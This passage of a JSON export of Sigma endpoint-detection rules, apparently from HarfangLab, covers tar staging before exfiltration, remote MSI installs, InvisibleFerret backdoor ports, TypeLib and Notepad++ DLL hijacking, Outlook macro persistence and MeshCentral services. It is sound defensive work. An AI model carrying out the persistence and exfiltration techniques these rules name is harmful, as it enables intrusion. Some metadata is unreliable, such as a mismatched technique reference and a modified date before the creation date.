"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81687d0a-fbde-46b9-806e-4ec222dbcb81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618575Z",
"creation_date": "2026-03-23T11:45:34.618577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_tar_archive_creation_file.yml",
"content": "title: Archive Created via tar in a Suspicious Folder\nid: 81687d0a-fbde-46b9-806e-4ec222dbcb81\ndescription: |\n Detects archive creation using tar in a folder commonly used by malicious code.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to tar's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/07/22\nmodified: 2024/03/12\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/tar'\n ProcessCommandLine|contains: ' -c'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81687d0a-fbde-46b9-806e-4ec222dbcb81",
"rule_name": "Archive Created via tar in a Suspicious Folder",
"rule_description": "Detects archive creation using tar in a folder commonly used by malicious code.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to tar's execution and the content of the archive.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2024-03-12",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81d540bc-ce2c-43e7-8b95-5d78f41f00cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089558Z",
"creation_date": "2026-03-23T11:45:34.089560Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089565Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/007/"
],
"name": "t1218_007_msiexec_remote_installation.yml",
"content": "title: MSI File Installed Remotely\nid: 81d540bc-ce2c-43e7-8b95-5d78f41f00cf\ndescription: |\n Detects the installation of a remote MSI file.\n Adversaries may install remote MSI in order to deploy malicious code on a compromised host.\n It is recommended to check if msiexec hash spawn any suspicious child process and determine the legitimacy of the contacted URL.\nreferences:\n - https://attack.mitre.org/techniques/T1218/007/\ndate: 2025/05/20\nmodified: 2025/11/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.007\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessImage|endswith: '\\msiexec.exe'\n ProcessParentImage|endswith: '\\services.exe'\n UserAgent:\n - 'Windows Installer'\n - 'AdvancedInstaller'\n RequestUrlHost|contains: '.' # host without dot is probably on local network\n\n exclusion_sccm:\n RequestUrl|contains:\n - '/sms_dp_smspkg$/'\n - '/nocert_sms_dp_smspkg$/'\n - '/ccmtokenauth_sms_dp_smspkg$/'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81d540bc-ce2c-43e7-8b95-5d78f41f00cf",
"rule_name": "MSI File Installed Remotely",
"rule_description": "Detects the installation of a remote MSI file.\nAdversaries may install remote MSI in order to deploy malicious code on a compromised host.\nIt is recommended to check if msiexec hash spawn any suspicious child process and determine the legitimacy of the contacted URL.\n",
"rule_creation_date": "2025-05-20",
"rule_modified_date": "2025-11-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81ee28b1-c1cb-437e-b0b2-465d0a0ed9f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075156Z",
"creation_date": "2026-03-23T11:45:34.075159Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075163Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/",
"https://objective-see.org/blog/blog_0x7A.html",
"https://www.group-ib.com/blog/apt-lazarus-python-scripts/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_invisibleferret_backdoor_windows.yml",
"content": "title: InvisibleFerret Backdoor Communication Detected (Windows)\nid: 81ee28b1-c1cb-437e-b0b2-465d0a0ed9f8\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.ThreatActor.APT38\n - classification.Windows.ThreatActor.Lazarus\n - classification.Windows.Malware.InvisibleFerret\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessImage: '?:\\Users\\\\*\\.pyp\\python.exe'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81ee28b1-c1cb-437e-b0b2-465d0a0ed9f8",
"rule_name": "InvisibleFerret Backdoor Communication Detected (Windows)",
"rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-10-25",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.credential_access",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1056.001",
"attack.t1555.003",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81ff4aaf-a9b8-4e55-8636-5ebde7e57ac6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071895Z",
"creation_date": "2026-03-23T11:45:34.071897Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_persistence_type_lib.yml",
"content": "title: TypeLib Hijacking via Registry\nid: 81ff4aaf-a9b8-4e55-8636-5ebde7e57ac6\ndescription: |\n Detects the registration of a new type library in the Windows registry.\n Type libraries are files that include information about types and objects exposed by an ActiveX (COM) application.\n Adversaries may register a new type library in order to establish persistence. This library will be executed when a specified process is launched.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2024/10/25\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'TypeLib\\{????????-????-????-????-????????????}\\\\*\\\\*\\WIN64\\'\n - 'TypeLib\\{????????-????-????-????-????????????}\\\\*\\\\*\\WIN32\\'\n Details|startswith: 'script:'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81ff4aaf-a9b8-4e55-8636-5ebde7e57ac6",
"rule_name": "TypeLib Hijacking via Registry",
"rule_description": "Detects the registration of a new type library in the Windows registry.\nType libraries are files that include information about types and objects exposed by an ActiveX (COM) application.\nAdversaries may register a new type library in order to establish persistence. This library will be executed when a specified process is launched.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-10-25",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82582694-2dc2-45e5-8e0c-be9a6740f79d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586469Z",
"creation_date": "2026-03-23T11:45:34.586473Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://asec.ahnlab.com/en/64106/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_notepadpp.yml",
"content": "title: DLL Hijacking via notepad++.exe\nid: 82582694-2dc2-45e5-8e0c-be9a6740f79d\ndescription: |\n Detects potential Windows DLL Hijacking via notepad++.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nreferences:\n - https://asec.ahnlab.com/en/64106/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/05/02\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'notepad++.exe'\n ProcessSignature: 'Notepad++'\n ImageLoaded|endswith: '\\mimeTools.dll'\n sha256|contains: '?'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\'\n - '?:\\Program Files\\Notepad++\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\'\n - '?:\\Program Files\\Notepad++\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Notepad++'\n filter_imageloaded_peinfo:\n OriginalFileName: 'base64.dll'\n Product: 'mimeTools'\n Description: 'Base64 encoder/decoder plugin for Notepad++'\n Company: 'Don HO don.h@free.fr'\n\n exclusion_known_sha256:\n # https://www.virustotal.com/gui/file/8397fcc9a83e2a009075074adc99db529cebd9d0a3fbc97cee264cb8db3a2564\n # https://github.com/npp-plugins/mimetools/releases\n sha256:\n - '8397fcc9a83e2a009075074adc99db529cebd9d0a3fbc97cee264cb8db3a2564' # version 1.9\n - '58868d7751e27881e5c2ceaede90ea26f2d093934788f7816305374fa8abc008' # version 2.0\n - '102519fc95a83fa0a0947a867b5f7706622174753dadb2a095c913ab2f6d0a60' # version 2.0 x64\n - '4195f522700ac3275b4ce6a19c1c06e3d1d438d0cd70037f86ce5c3812ffa70f' # version 2.1\n - '6ccfdef2c0f192a75f3cb90b744c7c38d3e2b08fd47e14f3d8b3d48f4a4e06de' # version 2.1 x64\n - '4b4c29d702ba40a1ff9e28a595325e03d7ca46a1f77caa035e22dd5ba1ade390' # version 2.2\n - '1d179a9f442865badeb7aba17abe15eca502372e39256a185be5fc7eb60a587a' # version 2.2 x64\n - '6308a6b58cc8750b2b4a430ada87952bf76fd029bf1efa5ae343a908775a2bd9' # version 2.3\n - '69447ccea6e9c4536ea7b1635212536d5b18a22b9aab177053e11a8fdfd6e918' # version 2.3 x64\n - '7713ab3268b0314bea3c6f203e1b8ab9faf1be24cc97b24fe9d1b79ec095dbb0' # version 2.4\n - 'b082e2614a75da2c395c5b85a09f9c331a6d2aaaae2d92e43e62478bae25b5a6' # version 2.4 x64\n - 'baaa72bf24911a5f14511d1b2ce31800b7288d575d4ae5c92cfb0b4b5cc73f98' # version 2.5\n - '4e5c3bf3212501b906355268043f34ff229d98b690ddedf07f2b298f875cf2f9' # version 2.5 x64\n - '8c47897872413b4adcd1ae59684e4bd60cf7a1db1c17ddf8111d80fdf52ca8eb' # version 2.6\n - '0875329e6d192e3115d773112f681bc0819274d1cbb80e38cd788e793cc38a90' # version 2.6 x64\n - '7c0ef37ad83ccadcb32e7ff86e3ee9d6a3f180d9166060fd9ec58dad194aa7a3' # version 2.7\n - '8d15d5dc4857858564cad0379bfde9044c93af249d497009b8667d8d6bfc0968' # version 2.7 x64\n - 'a89b66c32ce4b977cc3744e76186fddd16992414c825ea2f1166a1ae544d69da' # version 2.8\n - 'b9a8ca258aa3edca1aa1b3ea4e264d3b0cda7c82a30b7464586d8be95701ea61' # version 2.8 x64\n - '9fe58b3ec6710340627278f0022f27f940f93c71df769af5ad0dc2989aa2a277' # version 2.9\n - 'b034d12b7624b038b5d87d9f965d7dfb9c18a5c6eb82b7f44caa16749c4e00cc' # version 2.9 x64\n - 'f244bf96bcef25a9a941160e3cc97a83fcf37a568b2b71b43f0ae6f0c4122fe6' # version 3.0\n - '0886272a0acb394a380cdd8dbe965813501a626daa94b237419ad395609304b7' # version 3.0 x64\n - '00c14753d6ef8942edfe55c10b22749422151b42a78afec31fac200e91f3e447' # version 3.1\n - '4698005effd3dbe9acbda48538e5b00ae151923805c347768f748bf57a72f197' # version 3.1 x64\n - '713bc3a04165e66620aad6ea78c65a7fa7aeae9e400444d635a1e38859030c8c' # version 3.1 x64\n - '120fd0c27fb6e4528dd8ba61c10ec70b85e1cbe867762bdcaa1bb52b14fcf577' # version 3.1 x64\n - '3ec2935bbfed1b1401a58046c84d98dcb0360382d312c30812efc8a459b8f845' # version 3.1 x64\n - 'f30c60e22cf5343b28b111b1c4310f869ff38515024147fc7eaaab53659f96f1' # version 3.1 x64\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82582694-2dc2-45e5-8e0c-be9a6740f79d",
"rule_name": "DLL Hijacking via notepad++.exe",
"rule_description": "Detects potential Windows DLL Hijacking via notepad++.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n",
"rule_creation_date": "2024-05-02",
"rule_modified_date": "2025-09-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8297e246-5ae5-4dd3-a3c6-35e3ba315bad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621589Z",
"creation_date": "2026-03-23T11:45:34.621591Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621596Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1137_outlook_startup.yml",
"content": "title: Microsoft Outlook Startup Macro Created\nid: 8297e246-5ae5-4dd3-a3c6-35e3ba315bad\ndescription: |\n Detects an attempt to create VbaProject.OTM in Outlook user directory.\n Attackers can create startup VBA macros to achieve persistence at Outlook boot.\n It is recommended to analyze the process reponsible for the creation of the macro file as well as to analyze the file itself to look for malicious content or actions.\nreferences:\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_workspace_managers:\n - ProcessImage:\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\citrix\\user profile manager\\userprofilemanager.exe'\n - '?:\\Program Files (x86)\\citrix\\user profile manager\\userprofilemanager.exe'\n # https://www.fichorga.fr/nos-solutions.php\n - ProcessOriginalFileName: 'Inst_authentic_ui.exe'\n # svchost user environment manager\n - ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s SessionEnv'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8297e246-5ae5-4dd3-a3c6-35e3ba315bad",
"rule_name": "Microsoft Outlook Startup Macro Created",
"rule_description": "Detects an attempt to create VbaProject.OTM in Outlook user directory.\nAttackers can create startup VBA macros to achieve persistence at Outlook boot.\nIt is recommended to analyze the process reponsible for the creation of the macro file as well as to analyze the file itself to look for malicious content or actions.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82a30c48-7129-43eb-8568-c9a59ff30028",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076307Z",
"creation_date": "2026-03-23T11:45:34.076309Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076313Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://meshcentral.com/info/",
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://attack.mitre.org/techniques/T1569/002/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1543_003_meshcentral_service_installed.yml",
"content": "title: MeshCentral Service Installed\nid: 82a30c48-7129-43eb-8568-c9a59ff30028\ndescription: |\n Detects the installation of a MeshCentral service.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n It is recommended to remove unauthorized instances while reviewing historical network connections from the service endpoints.\nreferences:\n - https://meshcentral.com/info/\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://attack.mitre.org/techniques/T1569/002/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/08/23\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1569.002\n - attack.command_and_control\n - attack.t1543.003\n - classification.Windows.Source.EventLog\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 7045\n ServiceName|contains: 'Mesh Agent'\n\n condition: selection\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82a30c48-7129-43eb-8568-c9a59ff30028",
"rule_name": "MeshCentral Service Installed",
"rule_description": "Detects the installation of a MeshCentral service.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nIt is recommended to remove unauthorized instances while reviewing historical network connections from the service endpoints.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82ba06fb-1211-48c3-b5e3-be2baf17ac1c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088757Z",
"creation_date": "2026-03-23T11:45:34.088760Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088764Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1526833181831200770",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_suspicious_persistence_grpconv.yml",
